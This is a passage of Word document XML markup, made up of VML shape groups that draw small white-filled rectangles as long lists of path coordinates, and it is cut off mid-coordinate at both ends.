,6363,4706,6367,4706,6371,4706,6375,4706,6380,4706,6384,4706,6389,4706,6393,4706,6398,4706,6403,4706,6407,4706,6412,4706,6417,4706,6423,4706,6428,4706,6433,4706,6439,4706,6444,4706,6450,4706,6456,4706,6461,4706,6467,4706,6473,4706,6480,4706,6486,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4706,6492,4705,6492,4705,6492,4705,6492,4705,6492,4705,6492,4705,6492,4704,6492,4704,6492,4704,6492,4704,6492,4704,6492,4703,6492,4703,6492,4703,6492,4702,6492,4702,6492,4702,6492,4701,6492,4701,6492,4701,6492,4700,6492,4700,6492,4699,6492,4699,6492,4698,6492,4698,6492,4697,6492,4697,6492,4696,6492,4696,6492,4695,6492,4695,6492,4694,6492,4693,6492,4692,6492,4692,6492,4691,6492,4690,6492,4689,6492,4689,6492,4688,6492,4687,6492,4686,6492,4685,6492,4684,6492,4683,6492,4682,6492,4681,6492,4680,6492,4679,6492,4677,6492,4676,6492,4675,6492,4674,6492,4673,6492,4671,6492,4670,6492,4669,6492,4667,6492,4666,6492,4664,6492,4663,6492,4661,6492,4659,6492,4658,6492,4656,6492,4654,6492,4653,6492,4651,6492,4649,6492,4647,6492,4645,6492,4643,6492,4641,6492,4639,6492,4637,6492,4635,6492,4633,6492,4631,6492,4629,6492,4626,6492,4624,6492,4622,6492,4619,6492,4617,6492,4614,6492,4612,6492,4609,6492,4606,6492,4604,6492,4601,6492,4598,6492,4595,6492,4592,6492,4589,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6492,4586,6491,4586,6491,4586,6491,4586,6491,4586,6491,4586,6490,4586,6490,4586,6490,4586,6490,4586,6489,4586,6489,4586,6489,4586,6488,4586,6488,4586,6487,4586,6487,4586,6486,4586,6486,4586,6485,4586,6485,4586,6484,4586,6483,4586,6483,4586,6482,4586,6481,4586,6480,4586,6479,4586,6478,4586,6478,4586,6477,4586,6476,4586,6474,4586,6473,4586,6472,4586,6471,4586,6470,4586,6468,4586,6467,4586,6466,4586,6464,4586,6463,4586,6461,4586,6460,4586,6458,4586,6456,4586,6454,4586,6453,4586,6451,4586,6449,4586,6447,4586,6445,4586,6443,4586,6440,4586,6438,4586,6436,4586,6433,4586,6431,4586,6428,4586,6426,4586,6423,4586,6420,4586,6418,4586,6415,4586,6412,4586,6409,4586,6406,4586,6403,4586,6399,4586,6396,4586,6393,4586,6389,4586,6386,4586,6382,4586,6378,4586,6374,4586,6370,4586,6367,4586,6362,4586,6358,4586,6354,4586,6350,4586,6345,4586,6341,4586,6336,4586,6332,4586,6327,4586,6322,4586,6317,4586,6312,4586,6307,4586,6302,4586,6296,4586,6291,4586,6285,4586,6280,4586,6274,4586,6268,4586,6262,4586,6256,4586,6250,4586,6244,4586,6237e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:276.500pt;margin-top:310.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5530,6210" coordsize="130,270">
        <v:shape style="position:absolute;left:5530;top:6210;width:130;height:270" coordorigin="5530,6210" coordsize="130,270" path="m5547,6237l5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5547,6237,5548,6237,5548,6237,5548,6237,5548,6237,5548,6237,5548,6237,5548,6237,5549,6237,5549,6237,5549,6237,5549,6237,5549,6237,5550,6237,5550,6237,5550,6237,5550,6237,5551,6237,5551,6237,5551,6237,5552,6237,5552,6237,5552,6237,5553,6237,5553,6237,5554,6237,5554,6237,5555,6237,5555,6237,5556,6237,5556,6237,5557,6237,5557,6237,5558,6237,5559,6237,5559,6237,5560,6237,5561,6237,5561,6237,5562,6237,5563,6237,5564,6237,5565,6237,5565,6237,5566,6237,5567,6237,5568,6237,5569,6237,5570,6237,5571,6237,5572,6237,5573,6237,5575,6237,5576,6237,5577,6237,5578,6237,5579,6237,5581,6237,5582,6237,5583,6237,5585,6237,5586,6237,5588,6237,5589,6237,5591,6237,5592,6237,5594,6237,5595,6237,5597,6237,5599,6237,5600,6237,5602,6237,5604,6237,5606,6237,5608,6237,5610,6237,5612,6237,5614,6237,5616,6237,5618,6237,5620,6237,5622,6237,5625,6237,5627,6237,5629,6237,5632,6237,5634,6237,5637,6237,5639,6237,5642,6237,5644,6237,5647,6237,5650,6237,5652,6237,5655,6237,5658,6237,5661,6237,5664,6237,5667,6237,5667,6237,5667,6237,5667,6237,5667,6237,5667,6237,5667,6237,5667,6237,5667,6237,5667,6237,5667,6237,5667,6237,5667,6237,5667,6237,5667,6237,5667,6238,5667,6238,5667,6238,5667,6238,5667,6238,5667,6238,5667,6238,5667,6239,5667,6239,5667,6239,5667,6239,5667,6240,5667,6240,5667,6240,5667,6240,5667,6241,5667,6241,5667,6242,5667,6242,5667,6243,5667,6243,5667,6244,5667,6244,5667,6245,5667,6245,5667,6246,5667,6247,5667,6248,5667,6248,5667,6249,5667,6250,5667,6251,5667,6252,5667,6253,5667,6254,5667,6255,5667,6256,5667,6257,5667,6258,5667,6260,5667,6261,5667,6262,5667,6264,5667,6265,5667,6267,5667,6268,5667,6270,5667,6272,5667,6273,5667,6275,5667,6277,5667,6279,5667,6281,5667,6283,5667,6285,5667,6287,5667,6289,5667,6291,5667,6294,5667,6296,5667,6298,5667,6301,5667,6304,5667,6306,5667,6309,5667,6312,5667,6315,5667,6318,5667,6321,5667,6324,5667,6327,5667,6330,5667,6333,5667,6337,5667,6340,5667,6344,5667,6348,5667,6351,5667,6355,5667,6359,5667,6363,5667,6367,5667,6371,5667,6375,5667,6380,5667,6384,5667,6389,5667,6393,5667,6398,5667,6403,5667,6407,5667,6412,5667,6417,5667,6423,5667,6428,5667,6433,5667,6439,5667,6444,5667,6450,5667,6456,5667,6461,5667,6467,5667,6473,5667,6480,5667,6486,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5667,6492,5666,6492,5666,6492,5666,6492,5666,6492,5666,6492,5666,6492,5666,6492,5666,6492,5666,6492,5665,6492,5665,6492,5665,6492,5665,6492,5665,6492,5665,6492,5664,6492,5664,6492,5664,6492,5664,6492,5663,6492,5663,6492,5663,6492,5662,6492,5662,6492,5662,6492,5661,6492,5661,6492,5660,6492,5660,6492,5659,6492,5659,6492,5658,6492,5658,6492,5657,6492,5657,6492,5656,6492,5656,6492,5655,6492,5654,6492,5654,6492,5653,6492,5652,6492,5651,6492,5651,6492,5650,6492,5649,6492,5648,6492,5647,6492,5646,6492,5645,6492,5644,6492,5643,6492,5642,6492,5641,6492,5640,6492,5639,6492,5638,6492,5637,6492,5636,6492,5634,6492,5633,6492,5632,6492,5630,6492,5629,6492,5628,6492,5626,6492,5625,6492,5623,6492,5622,6492,5620,6492,5618,6492,5617,6492,5615,6492,5613,6492,5611,6492,5610,6492,5608,6492,5606,6492,5604,6492,5602,6492,5600,6492,5598,6492,5596,6492,5593,6492,5591,6492,5589,6492,5587,6492,5584,6492,5582,6492,5580,6492,5577,6492,5575,6492,5572,6492,5569,6492,5567,6492,5564,6492,5561,6492,5558,6492,5556,6492,5553,6492,5550,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6492,5547,6491,5547,6491,5547,6491,5547,6491,5547,6491,5547,6490,5547,6490,5547,6490,5547,6490,5547,6489,5547,6489,5547,6489,5547,6488,5547,6488,5547,6487,5547,6487,5547,6486,5547,6486,5547,6485,5547,6485,5547,6484,5547,6483,5547,6483,5547,6482,5547,6481,5547,6480,5547,6479,5547,6478,5547,6478,5547,6477,5547,6476,5547,6474,5547,6473,5547,6472,5547,6471,5547,6470,5547,6468,5547,6467,5547,6466,5547,6464,5547,6463,5547,6461,5547,6460,5547,6458,5547,6456,5547,6454,5547,6453,5547,6451,5547,6449,5547,6447,5547,6445,5547,6443,5547,6440,5547,6438,5547,6436,5547,6433,5547,6431,5547,6428,5547,6426,5547,6423,5547,6420,5547,6418,5547,6415,5547,6412,5547,6409,5547,6406,5547,6403,5547,6399,5547,6396,5547,6393,5547,6389,5547,6386,5547,6382,5547,6378,5547,6374,5547,6370,5547,6367,5547,6362,5547,6358,5547,6354,5547,6350,5547,6345,5547,6341,5547,6336,5547,6332,5547,6327,5547,6322,5547,6317,5547,6312,5547,6307,5547,6302,5547,6296,5547,6291,5547,6285,5547,6280,5547,6274,5547,6268,5547,6262,5547,6256,5547,6250,5547,6244,5547,6237e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:318.500pt;margin-top:310.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6370,6210" coordsize="130,270">
        <v:shape style="position:absolute;left:6370;top:6210;width:130;height:270" coordorigin="6370,6210" coordsize="130,270" path="m6387,6237l6387,6237,6387,6237,6387,6237,6387,6237,6387,6237,6387,6237,6387,6237,6387,6237,6387,6237,6387,6237,6387,6237,6387,6237,6387,6237,6387,6237,6387,6237,6387,6237,6388,6237,6388,6237,6388,6237,6388,6237,6388,6237,6388,6237,6388,6237,6388,6237,6388,6237,6388,6237,6388,6237,6389,6237,6389,6237,6389,6237,6389,6237,6389,6237,6390,6237,6390,6237,6390,6237,6390,6237,6391,6237,6391,6237,6391,6237,6391,6237,6392,6237,6392,6237,6392,6237,6393,6237,6393,6237,6394,6237,6394,6237,6395,6237,6395,6237,6396,6237,6396,6237,6397,6237,6397,6237,6398,6237,6398,6237,6399,6237,6400,6237,6400,6237,6401,6237,6402,6237,6403,6237,6403,6237,6404,6237,6405,6237,6406,6237,6407,6237,6408,6237,6409,6237,6410,6237,6411,6237,6412,6237,6413,6237,6414,6237,6415,6237,6416,6237,6417,6237,6418,6237,6420,6237,6421,6237,6422,6237,6424,6237,6425,6237,6427,6237,6428,6237,6429,6237,6431,6237,6433,6237,6434,6237,6436,6237,6437,6237,6439,6237,6441,6237,6443,6237,6445,6237,6446,6237,6448,6237,6450,6237,6452,6237,6454,6237,6456,6237,6458,6237,6461,6237,6463,6237,6465,6237,6467,6237,6470,6237,6472,6237,6474,6237,6477,6237,6479,6237,6482,6237,6485,6237,6487,6237,6490,6237,6493,6237,6496,6237,6498,6237,6501,6237,6504,6237,6507,6237,6507,6237,6507,6237,6507,6237,6507,6237,6507,6237,6507,6237,6507,6237,6507,6237,6507,6237,6507,6237,6507,6237,6507,6237,6507,6237,6507,6237,6507,6238,6507,6238,6507,6238,6507,6238,6507,6238,6507,6238,6507,6238,6507,6239,6507,6239,6507,6239,6507,6239,6507,6240,6507,6240,6507,6240,6507,6240,6507,6241,6507,6241,6507,6242,6507,6242,6507,6243,6507,6243,6507,6244,6507,6244,6507,6245,6507,6245,6507,6246,6507,6247,6507,6248,6507,6248,6507,6249,6507,6250,6507,6251,6507,6252,6507,6253,6507,6254,6507,6255,6507,6256,6507,6257,6507,6258,6507,6260,6507,6261,6507,6262,6507,6264,6507,6265,6507,6267,6507,6268,6507,6270,6507,6272,6507,6273,6507,6275,6507,6277,6507,6279,6507,6281,6507,6283,6507,6285,6507,6287,6507,6289,6507,6291,6507,6294,6507,6296,6507,6298,6507,6301,6507,6304,6507,6306,6507,6309,6507,6312,6507,6315,6507,6318,6507,6321,6507,6324,6507,6327,6507,6330,6507,6333,6507,6337,6507,6340,6507,6344,6507,6348,6507,6351,6507,6355,6507,6359,6507,6363,6507,6367,6507,6371,6507,6375,6507,6380,6507,6384,6507,6389,6507,6393,6507,6398,6507,6403,6507,6407,6507,6412,6507,6417,6507,6423,6507,6428,6507,6433,6507,6439,6507,6444,6507,6450,6507,6456,6507,6461,6507,6467,6507,6473,6507,6480,6507,6486,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6507,6492,6506,6492,6506,6492,6506,6492,6506,6492,6506,6492,6506,6492,6506,6492,6505,6492,6505,6492,6505,6492,6505,6492,6504,6492,6504,6492,6504,6492,6504,6492,6503,6492,6503,6492,6503,6492,6502,6492,6502,6492,6502,6492,6501,6492,6501,6492,6500,6492,6500,6492,6499,6492,6499,6492,6498,6492,6498,6492,6497,6492,6497,6492,6496,6492,6495,6492,6495,6492,6494,6492,6493,6492,6493,6492,6492,6492,6491,6492,6490,6492,6489,6492,6489,6492,6488,6492,6487,6492,6486,6492,6485,6492,6484,6492,6483,6492,6482,6492,6481,6492,6480,6492,6478,6492,6477,6492,6476,6492,6475,6492,6473,6492,6472,6492,6471,6492,6469,6492,6468,6492,6467,6492,6465,6492,6464,6492,6462,6492,6460,6492,6459,6492,6457,6492,6455,6492,6454,6492,6452,6492,6450,6492,6448,6492,6446,6492,6444,6492,6442,6492,6440,6492,6438,6492,6436,6492,6434,6492,6432,6492,6429,6492,6427,6492,6425,6492,6422,6492,6420,6492,6418,6492,6415,6492,6412,6492,6410,6492,6407,6492,6404,6492,6402,6492,6399,6492,6396,6492,6393,6492,6390,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6492,6387,6491,6387,6491,6387,6491,6387,6491,6387,6491,6387,6490,6387,6490,6387,6490,6387,6490,6387,6489,6387,6489,6387,6489,6387,6488,6387,6488,6387,6487,6387,6487,6387,6486,6387,6486,6387,6485,6387,6485,6387,6484,6387,6483,6387,6483,6387,6482,6387,6481,6387,6480,6387,6479,6387,6478,6387,6478,6387,6477,6387,6476,6387,6474,6387,6473,6387,6472,6387,6471,6387,6470,6387,6468,6387,6467,6387,6466,6387,6464,6387,6463,6387,6461,6387,6460,6387,6458,6387,6456,6387,6454,6387,6453,6387,6451,6387,6449,6387,6447,6387,6445,6387,6443,6387,6440,6387,6438,6387,6436,6387,6433,6387,6431,6387,6428,6387,6426,6387,6423,6387,6420,6387,6418,6387,6415,6387,6412,6387,6409,6387,6406,6387,6403,6387,6399,6387,6396,6387,6393,6387,6389,6387,6386,6387,6382,6387,6378,6387,6374,6387,6370,6387,6367,6387,6362,6387,6358,6387,6354,6387,6350,6387,6345,6387,6341,6387,6336,6387,6332,6387,6327,6387,6322,6387,6317,6387,6312,6387,6307,6387,6302,6387,6296,6387,6291,6387,6285,6387,6280,6387,6274,6387,6268,6387,6262,6387,6256,6387,6250,6387,6244,6387,6237e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:408.500pt;margin-top:310.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8170,6210" coordsize="130,270">
        <v:shape style="position:absolute;left:8170;top:6210;width:130;height:270" coordorigin="8170,6210" coordsize="130,270" path="m8188,6237l8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8188,6237,8189,6237,8189,6237,8189,6237,8189,6237,8189,6237,8189,6237,8189,6237,8189,6237,8189,6237,8190,6237,8190,6237,8190,6237,8190,6237,8190,6237,8190,6237,8191,6237,8191,6237,8191,6237,8191,6237,8192,6237,8192,6237,8192,6237,8193,6237,8193,6237,8193,6237,8194,6237,8194,6237,8195,6237,8195,6237,8196,6237,8196,6237,8197,6237,8197,6237,8198,6237,8198,6237,8199,6237,8199,6237,8200,6237,8201,6237,8201,6237,8202,6237,8203,6237,8204,6237,8204,6237,8205,6237,8206,6237,8207,6237,8208,6237,8209,6237,8210,6237,8211,6237,8212,6237,8213,6237,8214,6237,8215,6237,8216,6237,8217,6237,8218,6237,8219,6237,8221,6237,8222,6237,8223,6237,8225,6237,8226,6237,8227,6237,8229,6237,8230,6237,8232,6237,8233,6237,8235,6237,8237,6237,8238,6237,8240,6237,8242,6237,8244,6237,8245,6237,8247,6237,8249,6237,8251,6237,8253,6237,8255,6237,8257,6237,8259,6237,8262,6237,8264,6237,8266,6237,8268,6237,8271,6237,8273,6237,8275,6237,8278,6237,8280,6237,8283,6237,8286,6237,8288,6237,8291,6237,8294,6237,8296,6237,8299,6237,8302,6237,8305,6237,8308,6237,8308,6237,8308,6237,8308,6237,8308,6237,8308,6237,8308,6237,8308,6237,8308,6237,8308,6237,8308,6237,8308,6237,8308,6237,8308,6237,8308,6237,8308,6238,8308,6238,8308,6238,8308,6238,8308,6238,8308,6238,8308,6238,8308,6239,8308,6239,8308,6239,8308,6239,8308,6240,8308,6240,8308,6240,8308,6240,8308,6241,8308,6241,8308,6242,8308,6242,8308,6243,8308,6243,8308,6244,8308,6244,8308,6245,8308,6245,8308,6246,8308,6247,8308,6248,8308,6248,8308,6249,8308,6250,8308,6251,8308,6252,8308,6253,8308,6254,8308,6255,8308,6256,8308,6257,8308,6258,8308,6260,8308,6261,8308,6262,8308,6264,8308,6265,8308,6267,8308,6268,8308,6270,8308,6272,8308,6273,8308,6275,8308,6277,8308,6279,8308,6281,8308,6283,8308,6285,8308,6287,8308,6289,8308,6291,8308,6294,8308,6296,8308,6298,8308,6301,8308,6304,8308,6306,8308,6309,8308,6312,8308,6315,8308,6318,8308,6321,8308,6324,8308,6327,8308,6330,8308,6333,8308,6337,8308,6340,8308,6344,8308,6348,8308,6351,8308,6355,8308,6359,8308,6363,8308,6367,8308,6371,8308,6375,8308,6380,8308,6384,8308,6389,8308,6393,8308,6398,8308,6403,8308,6407,8308,6412,8308,6417,8308,6423,8308,6428,8308,6433,8308,6439,8308,6444,8308,6450,8308,6456,8308,6461,8308,6467,8308,6473,8308,6480,8308,6486,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8308,6492,8307,6492,8307,6492,8307,6492,8307,6492,8307,6492,8307,6492,8307,6492,8306,6492,8306,6492,8306,6492,8306,6492,8306,6492,8305,6492,8305,6492,8305,6492,8305,6492,8304,6492,8304,6492,8304,6492,8303,6492,8303,6492,8303,6492,8302,6492,8302,6492,8301,6492,8301,6492,8300,6492,8300,6492,8299,6492,8299,6492,8298,6492,8298,6492,8297,6492,8296,6492,8296,6492,8295,6492,8294,6492,8294,6492,8293,6492,8292,6492,8291,6492,8290,6492,8290,6492,8289,6492,8288,6492,8287,6492,8286,6492,8285,6492,8284,6492,8283,6492,8282,6492,8280,6492,8279,6492,8278,6492,8277,6492,8276,6492,8274,6492,8273,6492,8272,6492,8270,6492,8269,6492,8267,6492,8266,6492,8264,6492,8263,6492,8261,6492,8260,6492,8258,6492,8256,6492,8254,6492,8253,6492,8251,6492,8249,6492,8247,6492,8245,6492,8243,6492,8241,6492,8239,6492,8237,6492,8235,6492,8233,6492,8230,6492,8228,6492,8226,6492,8223,6492,8221,6492,8218,6492,8216,6492,8213,6492,8211,6492,8208,6492,8205,6492,8203,6492,8200,6492,8197,6492,8194,6492,8191,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6492,8188,6491,8188,6491,8188,6491,8188,6491,8188,6491,8188,6490,8188,6490,8188,6490,8188,6490,8188,6489,8188,6489,8188,6489,8188,6488,8188,6488,8188,6487,8188,6487,8188,6486,8188,6486,8188,6485,8188,6485,8188,6484,8188,6483,8188,6483,8188,6482,8188,6481,8188,6480,8188,6479,8188,6478,8188,6478,8188,6477,8188,6476,8188,6474,8188,6473,8188,6472,8188,6471,8188,6470,8188,6468,8188,6467,8188,6466,8188,6464,8188,6463,8188,6461,8188,6460,8188,6458,8188,6456,8188,6454,8188,6453,8188,6451,8188,6449,8188,6447,8188,6445,8188,6443,8188,6440,8188,6438,8188,6436,8188,6433,8188,6431,8188,6428,8188,6426,8188,6423,8188,6420,8188,6418,8188,6415,8188,6412,8188,6409,8188,6406,8188,6403,8188,6399,8188,6396,8188,6393,8188,6389,8188,6386,8188,6382,8188,6378,8188,6374,8188,6370,8188,6367,8188,6362,8188,6358,8188,6354,8188,6350,8188,6345,8188,6341,8188,6336,8188,6332,8188,6327,8188,6322,8188,6317,8188,6312,8188,6307,8188,6302,8188,6296,8188,6291,8188,6285,8188,6280,8188,6274,8188,6268,8188,6262,8188,6256,8188,6250,8188,6244,8188,6237e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:329.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,6590" coordsize="130,270">
        <v:shape style="position:absolute;left:2170;top:6590;width:130;height:270" coordorigin="2170,6590" coordsize="130,270" path="m2185,6612l2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2185,6612,2186,6612,2186,6612,2186,6612,2186,6612,2186,6612,2186,6612,2186,6612,2186,6612,2186,6612,2187,6612,2187,6612,2187,6612,2187,6612,2187,6612,2187,6612,2188,6612,2188,6612,2188,6612,2188,6612,2189,6612,2189,6612,2189,6612,2190,6612,2190,6612,2190,6612,2191,6612,2191,6612,2192,6612,2192,6612,2192,6612,2193,6612,2193,6612,2194,6612,2195,6612,2195,6612,2196,6612,2196,6612,2197,6612,2198,6612,2198,6612,2199,6612,2200,6612,2200,6612,2201,6612,2202,6612,2203,6612,2204,6612,2205,6612,2206,6612,2207,6612,2208,6612,2209,6612,2210,6612,2211,6612,2212,6612,2213,6612,2214,6612,2215,6612,2216,6612,2218,6612,2219,6612,2220,6612,2222,6612,2223,6612,2224,6612,2226,6612,2227,6612,2229,6612,2230,6612,2232,6612,2234,6612,2235,6612,2237,6612,2239,6612,2241,6612,2242,6612,2244,6612,2246,6612,2248,6612,2250,6612,2252,6612,2254,6612,2256,6612,2259,6612,2261,6612,2263,6612,2265,6612,2268,6612,2270,6612,2272,6612,2275,6612,2277,6612,2280,6612,2283,6612,2285,6612,2288,6612,2291,6612,2293,6612,2296,6612,2299,6612,2302,6612,2305,6612,2305,6612,2305,6612,2305,6612,2305,6612,2305,6612,2305,6612,2305,6612,2305,6612,2305,6612,2305,6612,2305,6612,2305,6613,2305,6613,2305,6613,2305,6613,2305,6613,2305,6613,2305,6613,2305,6613,2305,6613,2305,6614,2305,6614,2305,6614,2305,6614,2305,6614,2305,6615,2305,6615,2305,6615,2305,6616,2305,6616,2305,6616,2305,6617,2305,6617,2305,6618,2305,6618,2305,6619,2305,6619,2305,6620,2305,6621,2305,6621,2305,6622,2305,6623,2305,6624,2305,6624,2305,6625,2305,6626,2305,6627,2305,6628,2305,6629,2305,6630,2305,6631,2305,6632,2305,6634,2305,6635,2305,6636,2305,6638,2305,6639,2305,6640,2305,6642,2305,6643,2305,6645,2305,6647,2305,6648,2305,6650,2305,6652,2305,6654,2305,6656,2305,6658,2305,6660,2305,6662,2305,6664,2305,6667,2305,6669,2305,6671,2305,6674,2305,6676,2305,6679,2305,6681,2305,6684,2305,6687,2305,6690,2305,6693,2305,6696,2305,6699,2305,6702,2305,6705,2305,6709,2305,6712,2305,6716,2305,6719,2305,6723,2305,6726,2305,6730,2305,6734,2305,6738,2305,6742,2305,6746,2305,6751,2305,6755,2305,6759,2305,6764,2305,6768,2305,6773,2305,6778,2305,6783,2305,6788,2305,6793,2305,6798,2305,6803,2305,6808,2305,6814,2305,6819,2305,6825,2305,6831,2305,6837,2305,6843,2305,6849,2305,6855,2305,6861,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2305,6867,2304,6867,2304,6867,2304,6867,2304,6867,2304,6867,2304,6867,2304,6867,2303,6867,2303,6867,2303,6867,2303,6867,2303,6867,2302,6867,2302,6867,2302,6867,2302,6867,2301,6867,2301,6867,2301,6867,2300,6867,2300,6867,2299,6867,2299,6867,2299,6867,2298,6867,2298,6867,2297,6867,2297,6867,2296,6867,2296,6867,2295,6867,2295,6867,2294,6867,2293,6867,2293,6867,2292,6867,2291,6867,2291,6867,2290,6867,2289,6867,2288,6867,2287,6867,2286,6867,2286,6867,2285,6867,2284,6867,2283,6867,2282,6867,2281,6867,2280,6867,2279,6867,2277,6867,2276,6867,2275,6867,2274,6867,2273,6867,2271,6867,2270,6867,2269,6867,2267,6867,2266,6867,2264,6867,2263,6867,2261,6867,2260,6867,2258,6867,2257,6867,2255,6867,2253,6867,2251,6867,2250,6867,2248,6867,2246,6867,2244,6867,2242,6867,2240,6867,2238,6867,2236,6867,2234,6867,2232,6867,2230,6867,2227,6867,2225,6867,2223,6867,2220,6867,2218,6867,2215,6867,2213,6867,2210,6867,2208,6867,2205,6867,2202,6867,2200,6867,2197,6867,2194,6867,2191,6867,2188,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6867,2185,6866,2185,6866,2185,6866,2185,6866,2185,6866,2185,6865,2185,6865,2185,6865,2185,6864,2185,6864,2185,6864,2185,6863,2185,6863,2185,6862,2185,6862,2185,6862,2185,6861,2185,6860,2185,6860,2185,6859,2185,6858,2185,6858,2185,6857,2185,6856,2185,6855,2185,6855,2185,6854,2185,6853,2185,6852,2185,6851,2185,6850,2185,6849,2185,6847,2185,6846,2185,6845,2185,6844,2185,6842,2185,6841,2185,6839,2185,6838,2185,6836,2185,6835,2185,6833,2185,6831,2185,6830,2185,6828,2185,6826,2185,6824,2185,6822,2185,6820,2185,6818,2185,6816,2185,6813,2185,6811,2185,6809,2185,6806,2185,6804,2185,6801,2185,6798,2185,6796,2185,6793,2185,6790,2185,6787,2185,6784,2185,6781,2185,6778,2185,6774,2185,6771,2185,6768,2185,6764,2185,6761,2185,6757,2185,6753,2185,6750,2185,6746,2185,6742,2185,6738,2185,6734,2185,6729,2185,6725,2185,6721,2185,6716,2185,6711,2185,6707,2185,6702,2185,6697,2185,6692,2185,6687,2185,6682,2185,6677,2185,6671,2185,6666,2185,6660,2185,6655,2185,6649,2185,6643,2185,6637,2185,6631,2185,6625,2185,6619,2185,6612e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:347.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,6950" coordsize="130,270">
        <v:shape style="position:absolute;left:2170;top:6950;width:130;height:270" coordorigin="2170,6950" coordsize="130,270" path="m2185,6973l2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2185,6973,2186,6973,2186,6973,2186,6973,2186,6973,2186,6973,2186,6973,2186,6973,2186,6973,2186,6973,2187,6973,2187,6973,2187,6973,2187,6973,2187,6973,2187,6973,2188,6973,2188,6973,2188,6973,2188,6973,2189,6973,2189,6973,2189,6973,2190,6973,2190,6973,2190,6973,2191,6973,2191,6973,2192,6973,2192,6973,2192,6973,2193,6973,2193,6973,2194,6973,2195,6973,2195,6973,2196,6973,2196,6973,2197,6973,2198,6973,2198,6973,2199,6973,2200,6973,2200,6973,2201,6973,2202,6973,2203,6973,2204,6973,2205,6973,2206,6973,2207,6973,2208,6973,2209,6973,2210,6973,2211,6973,2212,6973,2213,6973,2214,6973,2215,6973,2216,6973,2218,6973,2219,6973,2220,6973,2222,6973,2223,6973,2224,6973,2226,6973,2227,6973,2229,6973,2230,6973,2232,6973,2234,6973,2235,6973,2237,6973,2239,6973,2241,6973,2242,6973,2244,6973,2246,6973,2248,6973,2250,6973,2252,6973,2254,6973,2256,6973,2259,6973,2261,6973,2263,6973,2265,6973,2268,6973,2270,6973,2272,6973,2275,6973,2277,6973,2280,6973,2283,6973,2285,6973,2288,6973,2291,6973,2293,6973,